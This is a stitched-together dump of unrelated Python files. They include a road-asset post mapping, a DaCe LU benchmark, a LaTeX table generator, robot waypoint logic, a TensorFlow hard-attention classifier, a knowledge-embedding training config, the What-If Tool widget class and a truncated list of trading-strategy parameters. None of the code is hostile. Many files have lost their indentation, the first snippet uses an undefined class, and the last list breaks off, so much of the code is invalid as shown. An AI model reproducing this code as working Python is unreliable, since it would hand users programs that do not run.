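# Usage sketch (hypothetical values, not part of the original module): an
# EstimatorSetting simply bundles a human-readable title, an estimator object
# and the hyper-parameter space to search over for that estimator.
_example_setting = EstimatorSetting(
    title='dummy estimator',
    estimator=object(),
    parameter_space={'alpha': [0.1, 1.0, 10.0]})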
|
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060339901(StandaardPost):
def __init__(self):
super().__init__(
nummer='0603.39901',
beschrijving='Heropvoegen van betonstraatstenen volgens 6-3.4',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BestratingVanBetonstraatsteen',
attribuutURI='',
dotnotatie='',
defaultWaarde='',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='wordt gemapt 2.0',
mappingOpmerking='Activiteit [Heropvoegen] komt niet voor in de OTL',
standaardpostnummer='0603.39901')])
|
import sys, inspect, re
from os.path import basename, split
__all__ = ['this_tests']
class RegisterTestsPerAPI:
apiTestsMap = dict()
@staticmethod
def this_tests(testedapi):
prev_frame = inspect.currentframe().f_back.f_back
pathfilename, line_number, test_function_name, lines, index = inspect.getframeinfo(prev_frame)
lineno_parentfunc, parent_func = get_parent_func(line_number, get_lines(pathfilename))
list_test = [{'file': basename(pathfilename), 'test': test_function_name , 'line': str(lineno_parentfunc)}]
fq_apiname = full_name_with_qualname(testedapi)
if fq_apiname in RegisterTestsPerAPI.apiTestsMap:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = RegisterTestsPerAPI.apiTestsMap[fq_apiname] + list_test
else:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = list_test
def this_tests(testedapi):
RegisterTestsPerAPI.this_tests(testedapi)
def full_name_with_qualname(testedapi):
return f'{testedapi.__module__}.{testedapi.__qualname__}'
def set_default(obj):
if isinstance(obj, set): return list(obj)
raise TypeError
def get_parent_func(lineno, lines):
    for idx, l in enumerate(reversed(lines[:lineno])):
        if re.match('^def test', l): return (lineno - (idx+1)), l
    return None, None  # keep the tuple shape so callers can always unpack
def get_lines(file):
with open(file, 'r') as f: return f.readlines()
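# Usage sketch (hypothetical test shown for illustration only): calling
# this_tests() from inside a test body registers that test against the fully
# qualified name of the API object it exercises, e.g.
#
#     def test_set_default():
#         this_tests(set_default)
#         assert sorted(set_default({1, 2})) == [1, 2]
#
# RegisterTestsPerAPI.apiTestsMap then maps '<module>.set_default' to a list of
# {'file': ..., 'test': ..., 'line': ...} entries for later reporting.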
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import math
import numpy as np
import dace
import polybench
N = dace.symbol('N')
#datatypes = [dace.float64, dace.int32, dace.float32]
datatype = dace.float64
# Dataset sizes
sizes = [{N: 40}, {N: 120}, {N: 400}, {N: 2000}, {N: 4000}]
args = [([N, N], datatype)]
def init_array(A):
n = N.get()
for i in range(0, n, 1):
for j in range(0, i + 1, 1):
# Python does modulo, while C does remainder ...
A[i, j] = datatype(-(j % n)) / n + 1
for j in range(i + 1, n, 1):
A[i, j] = datatype(0)
A[i, i] = datatype(1)
A[:] = np.dot(A, np.transpose(A))
@dace.program(datatype[N, N])
def lu(A):
for i in range(0, N, 1):
for j in range(0, i, 1):
@dace.map
def k_loop1(k: _[0:j]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
@dace.tasklet
def div():
ij_in << A[i, j]
jj_in << A[j, j]
out >> A[i, j]
out = ij_in / jj_in
for j in range(i, N, 1):
@dace.map
def k_loop2(k: _[0:i]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
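# Plain-NumPy reference of the same in-place LU update (an assumption added for
# validation only, not part of the DaCe program above); no pivoting is done.
def lu_reference(A):
    n = A.shape[0]
    for i in range(n):
        for j in range(i):
            # eliminate below the diagonal and scale by the pivot
            A[i, j] = (A[i, j] - A[i, :j] @ A[:j, j]) / A[j, j]
        for j in range(i, n):
            # update the remaining row entries
            A[i, j] = A[i, j] - A[i, :i] @ A[:i, j]
    return A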
if __name__ == '__main__':
polybench.main(sizes, args, [(0, 'A')], init_array, lu)
|
import pandas as pd
import numpy as np
COLORS_QTY: int = 5
# =============================================================================
# Argument parsing.
# =============================================================================
import argparse
from scipy import integrate
argument_parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="Plot figures based on run data.")
argument_default_values = {
"suffix": 'kissat_ibm',
"folder": "."
}
argument_parser.add_argument('-f', '--folder',
type=str,
action='store',
default=argument_default_values['folder'],
help="Folder in which to look for the file (default: '.')"
)
argument_parser.add_argument('-s', '--suffix',
type=str,
action='store',
default=argument_default_values['suffix'],
help="File suffix used in produce_run_data (default: 'kissat_ibm')"
)
parsed_parameters = argument_parser.parse_args()
folder: str = parsed_parameters.folder
suffix: str = parsed_parameters.suffix
# =============================================================================
# Finished parsing
# =============================================================================
def __rename_strategies__(df: pd.DataFrame) -> pd.DataFrame:
df["strategy"] = df["strategy"].str.replace(
".*-discrimination-based", "discrimination-based", regex=True)
df["strategy"] = df["strategy"].str.replace(
"Info. over Decision/Time", "information-based", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Random", "random", regex=False)
# Rename discrimination component
df["strategy"] = df["strategy"].str.replace(" 10100%", "", regex=False)
df["strategy"] = df["strategy"].str.replace(".00%", "%", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Subset", "subset", regex=False)
df["selection"] = df["strategy"].str.extract(r'^([^+]*) \+ .*')
df["discrimination"] = df["strategy"].str.extract(r'^[^+]* \+ (.*)')
return df
def __filter_best_strategies__(df: pd.DataFrame) -> pd.DataFrame:
# Remove all that don't have timeout correction
df["baseline"] = df["selection"].str.contains(
"random") | df["discrimination"].str.contains("subset")
return df
dico = {}
for i, configurations in enumerate(range(10, 60, 10)):
for j, split in enumerate(range(10, 60, 10)):
ratio = split / 100
detailed_df = pd.read_csv(f"{folder}/detailed_runs_{suffix}_{configurations}_{ratio}.csv")
detailed_df = detailed_df.drop("Unnamed: 0", axis=1)
detailed_df = __rename_strategies__(detailed_df)
df = __filter_best_strategies__(detailed_df)
# Remove subset
df = df[~df["discrimination"].str.contains("subset")]
# Take mean performance
df = df.groupby(["selection", "time"]).mean().reset_index()
df["prediction"] *= 100
for method in df["selection"].unique():
if method not in dico:
dico[method] = np.zeros((5, 5))
data = df[df["selection"] == method]
data = data[["prediction", "time"]].to_numpy()
auc = integrate.trapezoid(data[:, 0], dx=1, axis=0)
dico[method][i, j] = auc / 10000 * 100
COLOR_NAMES = [f"color{i+1}" for i in range(COLORS_QTY)]
for method, values in dico.items():
print("\\begin{table}")
print("\t\\centering")
print("\t\\caption{Percentage of total AUC Evolution for " + method + " on " + suffix.replace("_", " ") + "}")
print("\t\\begin{tabular}{"+ ("c" * 6) + "}")
print("\t\t\\toprule")
print("\t\tConfigurations & 10 & 20 & 30 & 40 & 50 \\\\")
mini = np.min(values)
maxi = np.max(values)
scale = maxi - mini
unit = scale / (len(COLOR_NAMES) - 1)
for j, percent in enumerate(range(10, 60, 10)):
line_values = [float(values[i, j])
for i, _ in enumerate(range(10, 60, 10))]
colors = [COLOR_NAMES[round((x - mini) / unit)] for x in line_values]
print(f"\t\t{percent}\\% & " + " & ".join(f"\\colorbox{{{color}!30}}{{{val:.1f}}}" for color, val in zip(colors, line_values)) + "\\\\")
print("\t\t\\bottomrule")
print("\t\\end{tabular}")
print("\\end{table}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import math
import numpy as np
FIELD_SCORE_NUM_OFFSET=6
class Waypoints:
def __init__(self, path, side):
self.points = []
self.number = 0
self.Waypoints_Lap = 0
self.next_target_idx = -1
self.all_field_score = np.ones([18]) # field score state
self._load_waypoints(path, side)
print ('[waypoint]number of waypoints: '+str(len(self.points)))
def _load_waypoints(self, path, side):
with open(path) as f:
lines = csv.reader(f)
for l in lines:
# x,y,radian,target_idx(refer main code)
point = [float(n) for n in l]
point[2] = point[2]*math.pi/180.0
if side == 'r':
point[3] = int(point[3])
else:
point[3] = int(point[4])
print(" "+str(point))
self.points.append(point[0:4])
def get_next_waypoint(self):
self.number = self.number+1
if self.number == len(self.points):
self.Waypoints_Lap = self.Waypoints_Lap+1
print("[waypoint]next lap!!!!!!")
self.number = 0
#print("[waypoint]search target !!!!!!", self.all_field_score)
        for i in list(range(self.number, len(self.points))) + list(range(self.number)):
score_num = self.points[i][3]
#print("[waypoint]"+str(score_num))
            # waypoint not related to scoring
if score_num == -1:
                # on the first lap, also visit waypoints that are not related to scoring
if self.Waypoints_Lap == 0:
return self.points[self.number][0:3]
continue
            # waypoint related to scoring
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
# if already get score, skip search
continue
else:
# if not get score, go to target
print("[waypoint]"+str(i)+"/"+str(len(self.points)))
self.number = i
return self.points[i][0:3]
print("[waypoint]got all field score !!!")
return self.points[self.number][0:3]
def get_current_waypoint(self):
return self.points[self.number]
def get_current_target_number(self):
# target No.
return self.points[self.number][3]
def get_any_waypoint(self, n):
return self.points[n]
def set_number(self, n):
self.number = n
def set_field_score(self, n):
self.all_field_score = n
# print(self.all_field_score)
def check_if_get_field_score(self, n):
score_num = n
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
return True
else:
return False
# if __name__ == "__main__":
# Waypoints('waypoints.csv')
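# Expected CSV layout (hypothetical example row, inferred from _load_waypoints):
#   x, y, angle_in_degrees, target_idx_red, target_idx_blue
#   1.5, 0.2, 90, 6, 7
# The angle is converted to radians on load, and either column 3 (side 'r') or
# column 4 (other side) is kept as the waypoint's target index.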
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Saccader-Classification network model.
Saccader model is an image classification model with a hard attention mechanism.
The model uses the saccader model for visual attention
and uses a separate network for classification.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from saccader import utils
from saccader.visual_attention import saccader
from tensorflow.contrib import slim as contrib_slim
from tensorflow_models.slim.nets import nets_factory
from tensorflow_models.slim.nets.nasnet import nasnet
slim = contrib_slim
Saccader = saccader.Saccader
class SaccaderClassNet(Saccader):
"""Saccader-Classification Model.
Network that performs classification on images by taking glimpses at
different locations on an image.
Attributes:
num_classes: (Integer) Number of classification classes.
variable_scope: (String) Name of model variable scope.
attention_groups: (Integer) Number of groups in attention network.
attention_layers_per_group: (Integer) Number of layers in each group in
attention network.
saccader_cell: Saccader Cell object.
representation_network: Representation network object.
glimpse_shape: 2-D tuple of integers indicating glimpse shape.
glimpse_shape_classnet: 2-D tuple of integers indicating classification
network glimpse shape.
glimpse_shape_saccader: 2-D tuple of integers indicating saccader
glimpse shape.
var_list_representation_network: List of variables for the representation
network.
var_list_attention_network: List of variables for the attention network.
var_list_saccader_cell: List of variables for the saccader cell.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list_classnet: List of variables for the classification network.
var_list: List of all model variables.
init_op: Initialization operations for model variables.
"""
def __init__(self, config, variable_scope="saccader_classnet"):
Saccader.__init__(self, config, variable_scope=variable_scope+"/saccader")
self.var_list_saccader = []
self.var_list_classnet = []
self.classnet_type = config.classnet_type
self.num_classes = config.num_classes
self.variable_scope_classnet = variable_scope+"/"+self.classnet_type
self.glimpse_shape_saccader = (-1, -1)
self.glimpse_shape_classnet = config.glimpse_shape
def __call__(self,
images_saccader,
images_classnet,
num_times,
is_training_saccader=False,
is_training_classnet=False,
policy="learned",
stop_gradient_after_representation=False):
logits, locations_t, best_locations_t, endpoints = Saccader.__call__(
self,
images_saccader,
num_times,
is_training=is_training_saccader,
policy=policy,
stop_gradient_after_representation=stop_gradient_after_representation)
self.glimpse_shape_saccader = self.glimpse_shape
image_size_saccader = images_saccader.shape.as_list()[1]
image_size_classnet = images_classnet.shape.as_list()[1]
if self.glimpse_shape_classnet[0] < 0:
self.glimpse_shape_classnet = tuple([int(
image_size_classnet / image_size_saccader *
self.glimpse_shape[0])] * 2)
self.glimpse_shape = self.glimpse_shape_classnet
images_glimpse_t = []
for locations in locations_t:
images_glimpse = utils.extract_glimpse(
images_classnet, size=self.glimpse_shape_classnet, offsets=locations)
images_glimpse_t.append(images_glimpse)
batch_size = images_classnet.shape.as_list()[0]
images_glimpse_t = tf.concat(images_glimpse_t, axis=0)
variables_before = set(tf.global_variables())
reuse = True if self.var_list_classnet else False
with tf.variable_scope(self.variable_scope_classnet, reuse=reuse):
if self.classnet_type == "nasnet":
classnet_config = nasnet.large_imagenet_config()
classnet_config.use_aux_head = 0
classnet_config.drop_path_keep_prob = 1.0
with slim.arg_scope(nasnet.nasnet_large_arg_scope()):
classnet_logits, endpoints_ = nasnet.build_nasnet_large(
images_glimpse_t, self.num_classes,
is_training=is_training_classnet,
config=classnet_config)
elif self.classnet_type == "resnet_v2_50":
network = nets_factory.get_network_fn(
"resnet_v2_50", self.num_classes, is_training=is_training_classnet)
classnet_logits, endpoints_ = network(images_glimpse_t)
endpoints["classnet"] = endpoints_
variables_after = set(tf.global_variables())
logits_t = tf.reshape(classnet_logits, (num_times, batch_size, -1))
logits = tf.reduce_mean(logits_t, axis=0)
if not reuse:
self.var_list_saccader = self.var_list_classification + self.var_list_location
self.var_list_classnet = [
v for v in list(variables_after-variables_before)
if "global_step" not in v.op.name]
self.var_list.extend(self.var_list_classnet)
self.init_op = tf.variables_initializer(var_list=self.var_list)
return logits, locations_t, best_locations_t, endpoints
|
from typing import Any


class Page(object):
start: int
end: int
domain: str
all_urls: Any
m3u8_dict: dict
__slots__ = ("start", "end", "domain", "all_urls", "m3u8_dict")
    def __init__(self, start, end, domain, all_urls=None, **m3u8_dict):
        # super().__init__()
        self.start = start
        self.end = end
        self.domain = domain
        # Use a None sentinel to avoid sharing one mutable default list.
        self.all_urls = all_urls if all_urls is not None else []
        self.m3u8_dict = m3u8_dict
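# Usage sketch (hypothetical values): positional arguments fill the slotted
# fields and any extra keyword arguments are collected into m3u8_dict.
_example_page = Page(1, 10, "example.com",
                     ["https://example.com/ep1.m3u8"], quality="720p")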
|
import config
import models
import tensorflow as tf
import numpy as np
import os
from sys import argv
os.environ['CUDA_VISIBLE_DEVICES']='0'
#Input training files from benchmarks/FB15K/ folder.
con = config.Config()
#True: Input test files from the same folder.
con.set_in_path("./benchmarks/FB15K237/")
con.set_test_link_prediction(True)
# con.set_test_triple_classification(True)
con.set_work_threads(8)
con.set_train_times(1000)
con.set_nbatches(100)
con.set_alpha(1.0)
con.set_margin(4.0)
con.set_bern(1)
con.set_dimension(200)
con.set_ent_neg_rate(25)
con.set_rel_neg_rate(0)
con.set_opt_method("SGD")
#Models will be exported via tf.Saver() automatically.
con.set_export_files("./res/model.vec.tf", 0)
#Model parameters will be exported to json files automatically.
con.set_out_files("./res/embedding.vec.json")
#Initialize experimental settings.
con.init()
#Set the knowledge embedding model
con.set_model(models.TransD)
#Train the model.
con.run()
#To test models after training needs "set_test_flag(True)".
con.test()
|
from database.database_util import connect_to_skip_database
from skip_dataset.generate_histogram import generate_histogram
from skip_dataset.generate_track_data import generate_track_data
from skip_dataset.plot_track_sum import plot_track_sum
# File used to execute different functions related to Spotify Sequential Skip Prediction Challenge dataset.
# The functions are roughly grouped in different categories.
# Recommended use is to only execute one at the time,
# each function is explained in the associated file.
if __name__ == '__main__':
# Establish a database connection.
connect_to_skip_database()
# generate_track_data()
# plot_track_sum()
generate_histogram()
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import googleapiclient.discovery
import os
import tensorflow as tf
from IPython import display
from google.protobuf import json_format
from numbers import Number
from six import ensure_str
from tensorboard.plugins.interactive_inference.utils import inference_utils
# Constants used in mutant inference generation.
NUM_MUTANTS_TO_GENERATE = 10
NUM_EXAMPLES_FOR_MUTANT_ANALYSIS = 50
# Custom user agent for tracking number of calls to Cloud AI Platform.
USER_AGENT_FOR_CAIP_TRACKING = 'WhatIfTool'
class WitWidgetBase(object):
"""WIT widget base class for common code between Jupyter and Colab."""
def __init__(self, config_builder):
"""Constructor for WitWidgetBase.
Args:
config_builder: WitConfigBuilder object containing settings for WIT.
"""
tf.logging.set_verbosity(tf.logging.WARN)
config = config_builder.build()
copied_config = dict(config)
self.estimator_and_spec = (
dict(config.get('estimator_and_spec'))
if 'estimator_and_spec' in config else {})
self.compare_estimator_and_spec = (
dict(config.get('compare_estimator_and_spec'))
if 'compare_estimator_and_spec' in config else {})
if 'estimator_and_spec' in copied_config:
del copied_config['estimator_and_spec']
if 'compare_estimator_and_spec' in copied_config:
del copied_config['compare_estimator_and_spec']
self.custom_predict_fn = (
config.get('custom_predict_fn')
if 'custom_predict_fn' in config else None)
self.compare_custom_predict_fn = (
config.get('compare_custom_predict_fn')
if 'compare_custom_predict_fn' in config else None)
self.adjust_prediction_fn = (
config.get('adjust_prediction')
if 'adjust_prediction' in config else None)
self.compare_adjust_prediction_fn = (
config.get('compare_adjust_prediction')
if 'compare_adjust_prediction' in config else None)
self.adjust_example_fn = (
config.get('adjust_example')
if 'adjust_example' in config else None)
self.compare_adjust_example_fn = (
config.get('compare_adjust_example')
if 'compare_adjust_example' in config else None)
if 'custom_predict_fn' in copied_config:
del copied_config['custom_predict_fn']
if 'compare_custom_predict_fn' in copied_config:
del copied_config['compare_custom_predict_fn']
if 'adjust_prediction' in copied_config:
del copied_config['adjust_prediction']
if 'compare_adjust_prediction' in copied_config:
del copied_config['compare_adjust_prediction']
if 'adjust_example' in copied_config:
del copied_config['adjust_example']
if 'compare_adjust_example' in copied_config:
del copied_config['compare_adjust_example']
self.set_examples(config['examples'])
del copied_config['examples']
self.config = copied_config
# If using AI Platform for prediction, set the correct custom prediction
# functions.
if self.config.get('use_aip'):
self.custom_predict_fn = self._predict_aip_model
if self.config.get('compare_use_aip'):
self.compare_custom_predict_fn = self._predict_aip_compare_model
def _get_element_html(self):
return """
<link rel="import" href="/nbextensions/wit-widget/wit_jupyter.html">"""
def set_examples(self, examples):
"""Sets the examples shown in WIT.
The examples are initially set by the examples specified in the config
builder during construction. This method can change which examples WIT
displays.
"""
self.examples = [json_format.MessageToJson(ex) for ex in examples]
self.updated_example_indices = set(range(len(examples)))
def json_to_proto(self, json):
ex = (tf.train.SequenceExample()
if self.config.get('are_sequence_examples')
else tf.train.Example())
json_format.Parse(json, ex)
return ex
def infer_impl(self):
"""Performs inference on examples that require inference."""
indices_to_infer = sorted(self.updated_example_indices)
examples_to_infer = [
self.json_to_proto(self.examples[index]) for index in indices_to_infer]
infer_objs = []
attribution_objs = []
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
self.updated_example_indices = set()
return {
'inferences': {'indices': indices_to_infer, 'results': infer_objs},
'label_vocab': self.config.get('label_vocab'),
'attributions': attribution_objs}
def infer_mutants_impl(self, info):
"""Performs mutant inference on specified examples."""
example_index = int(info['example_index'])
feature_name = info['feature_name']
examples = (self.examples if example_index == -1
else [self.examples[example_index]])
examples = [self.json_to_proto(ex) for ex in examples]
scan_examples = [self.json_to_proto(ex) for ex in self.examples[0:50]]
serving_bundles = []
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn))
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn))
viz_params = inference_utils.VizParams(
info['x_min'], info['x_max'],
scan_examples, 10,
info['feature_index_pattern'])
return inference_utils.mutant_charts_for_feature(
examples, feature_name, serving_bundles, viz_params)
def get_eligible_features_impl(self):
"""Returns information about features eligible for mutant inference."""
examples = [self.json_to_proto(ex) for ex in self.examples[
0:NUM_EXAMPLES_FOR_MUTANT_ANALYSIS]]
return inference_utils.get_eligible_features(
examples, NUM_MUTANTS_TO_GENERATE)
def create_sprite(self):
"""Returns an encoded image of thumbnails for image examples."""
# Generate a sprite image for the examples if the examples contain the
# standard encoded image feature.
if not self.examples:
return None
example_to_check = self.json_to_proto(self.examples[0])
feature_list = (example_to_check.context.feature
if self.config.get('are_sequence_examples')
else example_to_check.features.feature)
if 'image/encoded' in feature_list:
example_strings = [
self.json_to_proto(ex).SerializeToString()
for ex in self.examples]
encoded = ensure_str(base64.b64encode(
inference_utils.create_sprite_image(example_strings)))
return 'data:image/png;base64,{}'.format(encoded)
else:
return None
def _json_from_tf_examples(self, tf_examples):
json_exs = []
feature_names = self.config.get('feature_names')
for ex in tf_examples:
# Create a JSON list or dict for each example depending on settings.
# Strip out any explicitly-labeled target feature from the example.
# This is needed because AI Platform models that accept JSON cannot handle
# when non-input features are provided as part of the object to run
# prediction on.
if self.config.get('uses_json_list'):
json_ex = []
for feat in ex.features.feature:
if feature_names and feat in feature_names:
feat_idx = feature_names.index(feat)
else:
feat_idx = int(feat)
if (feat == self.config.get('target_feature') or
feat_idx == self.config.get('target_feature')):
continue
# Ensure the example value list is long enough to add the next feature
# from the tf.Example.
if feat_idx >= len(json_ex):
json_ex.extend([None] * (feat_idx - len(json_ex) + 1))
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat_idx] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat_idx] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat_idx] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
else:
json_ex = {}
for feat in ex.features.feature:
if feat == self.config.get('target_feature'):
continue
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
json_exs.append(json_ex)
return json_exs
def _predict_aip_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address'),
self.config.get('model_name'), self.config.get('model_signature'),
self.config.get('force_json_input'), self.adjust_example_fn,
self.adjust_prediction_fn)
def _predict_aip_compare_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address_2'),
self.config.get('model_name_2'), self.config.get('model_signature_2'),
self.config.get('compare_force_json_input'),
self.compare_adjust_example_fn,
self.compare_adjust_prediction_fn)
def _predict_aip_impl(self, examples, project, model, version, force_json,
adjust_example, adjust_prediction):
"""Custom prediction function for running inference through AI Platform."""
# Set up environment for GCP call for specified project.
os.environ['GOOGLE_CLOUD_PROJECT'] = project
service = googleapiclient.discovery.build('ml', 'v1', cache_discovery=False)
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
# Properly package the examples to send for prediction.
if self.config.get('uses_json_input') or force_json:
examples_for_predict = self._json_from_tf_examples(examples)
else:
examples_for_predict = [{'b64': base64.b64encode(
example.SerializeToString()).decode('utf-8') }
for example in examples]
# If there is a user-specified input example adjustment to make, make it.
if adjust_example:
examples_for_predict = [
adjust_example(ex) for ex in examples_for_predict]
# Send request, including custom user-agent for tracking.
request_builder = service.projects().predict(
name=name,
body={'instances': examples_for_predict}
)
user_agent = request_builder.headers.get('user-agent')
request_builder.headers['user-agent'] = (
USER_AGENT_FOR_CAIP_TRACKING + ('-' + user_agent if user_agent else ''))
response = request_builder.execute()
if 'error' in response:
raise RuntimeError(response['error'])
# Get the key to extract the prediction results from.
results_key = self.config.get('predict_output_tensor')
if results_key is None:
if self.config.get('model_type') == 'classification':
results_key = 'probabilities'
else:
results_key = 'outputs'
# Parse the results from the response and return them.
results = []
attributions = (response['attributions']
if 'attributions' in response else None)
for pred in response['predictions']:
# If the prediction contains a key to fetch the prediction, use it.
if isinstance(pred, dict):
pred = pred[results_key]
# If the model is regression and the response is a list, extract the
# score by taking the first element.
if (self.config.get('model_type') == 'regression' and
isinstance(pred, list)):
pred = pred[0]
# If an prediction adjustment function was provided, use it to adjust
# the prediction.
if adjust_prediction:
pred = adjust_prediction(pred)
results.append(pred)
return {'predictions': results, 'attributions': attributions}
|
dnas = [
['wVW*?', 48, 52, 15.52, 40, 10, -0.23, {'ott_len': 35, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['ftUQf', 46, 66, 10.18, 58, 12, 3.51, {'ott_len': 33, 'ott_percent': 246, 'ott_bw': 117, 'tps_qty_index': 65, 'max_risk': 54}],
['ui*5<', 44, 84, 12.12, 42, 14, 6.81, {'ott_len': 35, 'ott_percent': 232, 'ott_bw': 64, 'tps_qty_index': 21, 'max_risk': 28}],
['-SUNv', 51, 64, 24.47, 58, 12, 3.76, {'ott_len': 26, 'ott_percent': 205, 'ott_bw': 117, 'tps_qty_index': 60, 'max_risk': 64}],
[':YY:_', 54, 59, 21.43, 58, 12, 3.52, {'ott_len': 27, 'ott_percent': 212, 'ott_bw': 122, 'tps_qty_index': 28, 'max_risk': 50}],
['@_W*?', 44, 58, 22.34, 55, 9, 4.25, {'ott_len': 28, 'ott_percent': 220, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
[':VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['7VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['q9da]', 71, 14, 11.37, 75, 4, 3.13, {'ott_len': 34, 'ott_percent': 172, 'ott_bw': 136, 'tps_qty_index': 90, 'max_risk': 49}],
['eVswv', 63, 19, 11.55, 100, 4, 5.34, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 125, 'max_risk': 64}],
['-VUWv', 53, 66, 19.51, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 117, 'tps_qty_index': 74, 'max_risk': 64}],
['@TW*?', 51, 56, 14.24, 45, 11, -1.0, {'ott_len': 28, 'ott_percent': 206, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@^W*?', 45, 57, 21.06, 55, 9, 4.26, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['_W6,U', 40, 84, 9.31, 50, 14, 6.21, {'ott_len': 32, 'ott_percent': 210, 'ott_bw': 79, 'tps_qty_index': 6, 'max_risk': 43}],
['-VW*9', 57, 49, 23.19, 27, 11, -0.52, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 26}],
['@cW*?', 47, 61, 22.93, 50, 12, 0.29, {'ott_len': 28, 'ott_percent': 225, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['3OWXC', 54, 57, 20.13, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 32}],
['3OWXE', 55, 58, 20.61, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 33}],
